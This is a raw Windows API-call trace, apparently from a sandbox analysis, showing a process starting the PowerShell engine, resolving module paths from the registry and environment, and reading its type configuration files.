	[0288.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.137] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.137] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0288.137] CoTaskMemFree (pv=0x3a7210) 
	[0288.139] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b7910
	[0288.139] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b7910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0288.139] CoTaskMemFree (pv=0x1b7b7910) 
	[0288.139] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d568 | out: phkResult=0x12d568*=0x1d4) returned 0x0
	[0288.139] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d4ec, lpData=0x0, lpcbData=0x12d4e8*=0x0 | out: lpType=0x12d4ec*=0x2, lpData=0x0, lpcbData=0x12d4e8*=0x6c) returned 0x0
	[0288.139] CoTaskMemAlloc (cb=0x70) returned 0x3552d0
	[0288.139] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d4bc, lpData=0x3552d0, lpcbData=0x12d4b8*=0x6c | out: lpType=0x12d4bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d4b8*=0x6c) returned 0x0
	[0288.140] CoTaskMemFree (pv=0x3552d0) 
	[0288.140] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b7910
	[0288.140] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7b7910, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0288.140] CoTaskMemFree (pv=0x1b7b7910) 
	[0288.140] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b7910
	[0288.140] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b7910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0288.140] CoTaskMemFree (pv=0x1b7b7910) 
	[0288.145] RegCloseKey (hKey=0x1d4) returned 0x0
	[0288.145] CoTaskMemAlloc (cb=0xcc) returned 0x1b7b7910
	[0288.145] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7b7910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0288.145] CoTaskMemFree (pv=0x1b7b7910) 
	[0288.145] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d568 | out: phkResult=0x12d568*=0x1d4) returned 0x0
	[0288.145] RegQueryValueExW (in: hKey=0x1d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d4ec, lpData=0x0, lpcbData=0x12d4e8*=0x0 | out: lpType=0x12d4ec*=0x0, lpData=0x0, lpcbData=0x12d4e8*=0x0) returned 0x2
	[0288.145] RegCloseKey (hKey=0x1d4) returned 0x0
	[0288.151] CoTaskMemAlloc (cb=0x20c) returned 0x3a3d20
	[0288.151] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a3d20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0288.152] CoTaskMemFree (pv=0x3a3d20) 
	[0288.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0288.153] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0288.159] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.159] CoTaskMemFree (pv=0x3a7210) 
	[0288.161] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.161] CoTaskMemFree (pv=0x3a7210) 
	[0288.793] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.794] CoTaskMemFree (pv=0x3a7210) 
	[0288.794] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.794] CoTaskMemFree (pv=0x3a7210) 
	[0288.799] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d358 | out: phkResult=0x12d358*=0x330) returned 0x0
	[0288.800] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x12d36c, lpData=0x0, lpcbData=0x12d368*=0x0 | out: lpType=0x12d36c*=0x1, lpData=0x0, lpcbData=0x12d368*=0x74) returned 0x0
	[0288.801] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x12d2dc, lpData=0x0, lpcbData=0x12d2d8*=0x0 | out: lpType=0x12d2dc*=0x1, lpData=0x0, lpcbData=0x12d2d8*=0x74) returned 0x0
	[0288.801] CoTaskMemAlloc (cb=0x78) returned 0x3552d0
	[0288.801] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x12d2ac, lpData=0x3552d0, lpcbData=0x12d2a8*=0x74 | out: lpType=0x12d2ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d2a8*=0x74) returned 0x0
	[0288.801] CoTaskMemFree (pv=0x3552d0) 
	[0288.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0288.801] SetErrorMode (uMode=0x1) returned 0x1
	[0288.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d230 | out: lpFileInformation=0x12d230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0288.801] SetErrorMode (uMode=0x1) returned 0x1
	[0288.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0288.802] SetErrorMode (uMode=0x1) returned 0x1
	[0288.803] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d230 | out: lpFileInformation=0x12d230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0288.803] SetErrorMode (uMode=0x1) returned 0x1
	[0288.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0288.805] SetErrorMode (uMode=0x1) returned 0x1
	[0288.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d230 | out: lpFileInformation=0x12d230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0288.805] SetErrorMode (uMode=0x1) returned 0x1
	[0288.807] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.807] CoTaskMemFree (pv=0x3a7210) 
	[0288.812] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0288.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.812] CoTaskMemFree (pv=0x3a7210) 
	[0288.812] GetACP () returned 0x4e4
	[0288.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0288.819] SetErrorMode (uMode=0x1) returned 0x1
	[0288.819] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0288.819] GetFileType (hFile=0x334) returned 0x1
	[0288.819] SetErrorMode (uMode=0x1) returned 0x1
	[0288.819] GetFileType (hFile=0x334) returned 0x1
	[0288.821] ReadFile (in: hFile=0x334, lpBuffer=0x2d5c058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5c058*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0288.823] ReadFile (in: hFile=0x334, lpBuffer=0x2d5c058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5c058*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0288.823] ReadFile (in: hFile=0x334, lpBuffer=0x2d5c058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5c058*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0288.824] ReadFile (in: hFile=0x334, lpBuffer=0x2d5c058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5c058*, lpNumberOfBytesRead=0x12d168*=0xcf3, lpOverlapped=0x0) returned 1
	[0288.824] ReadFile (in: hFile=0x334, lpBuffer=0x2d5b4b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5b4b3*, lpNumberOfBytesRead=0x12d168*=0x0, lpOverlapped=0x0) returned 1
	[0288.824] ReadFile (in: hFile=0x334, lpBuffer=0x2d5c058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2d5c058*, lpNumberOfBytesRead=0x12d168*=0x0, lpOverlapped=0x0) returned 1
	[0288.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0288.828] SetErrorMode (uMode=0x1) returned 0x1
	[0288.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d0e0 | out: lpFileInformation=0x12d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0288.828] SetErrorMode (uMode=0x1) returned 0x1
	[0288.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0288.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1c8 | out: phkResult=0x12d1c8*=0x334) returned 0x0
	[0288.830] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d14c, lpData=0x0, lpcbData=0x12d148*=0x0 | out: lpType=0x12d14c*=0x1, lpData=0x0, lpcbData=0x12d148*=0x56) returned 0x0
	[0288.830] CoTaskMemAlloc (cb=0x5a) returned 0x3cf3e0
	[0288.830] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d11c, lpData=0x3cf3e0, lpcbData=0x12d118*=0x56 | out: lpType=0x12d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d118*=0x56) returned 0x0
	[0288.830] CoTaskMemFree (pv=0x3cf3e0) 
	[0288.831] RegCloseKey (hKey=0x334) returned 0x0
	[0288.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0288.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0289.502] GetSystemInfo (in: lpSystemInfo=0x12be00 | out: lpSystemInfo=0x12be00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0289.503] VirtualQuery (in: lpAddress=0x12beb0, lpBuffer=0x12cd70, dwLength=0x30 | out: lpBuffer=0x12cd70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0289.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0289.519] SetErrorMode (uMode=0x1) returned 0x1
	[0289.519] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0289.519] GetFileType (hFile=0x334) returned 0x1
	[0289.519] SetErrorMode (uMode=0x1) returned 0x1
	[0289.519] GetFileType (hFile=0x334) returned 0x1
	[0291.976] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.977] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.977] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.977] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.977] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.978] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.978] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.978] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.978] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.979] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.980] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.980] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.980] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.980] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.981] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.981] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.981] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.983] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.983] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.983] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.983] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.984] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.984] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.984] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
	[0291.984] ReadFile (in: hFile=0x334, lpBuffer=0x2c257d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d168, lpOverlapped=0x0 | out: lpBuffer=0x2c257d8*, lpNumberOfBytesRead=0x12d168*=0x1000, lpOverlapped=0x0) returned 1
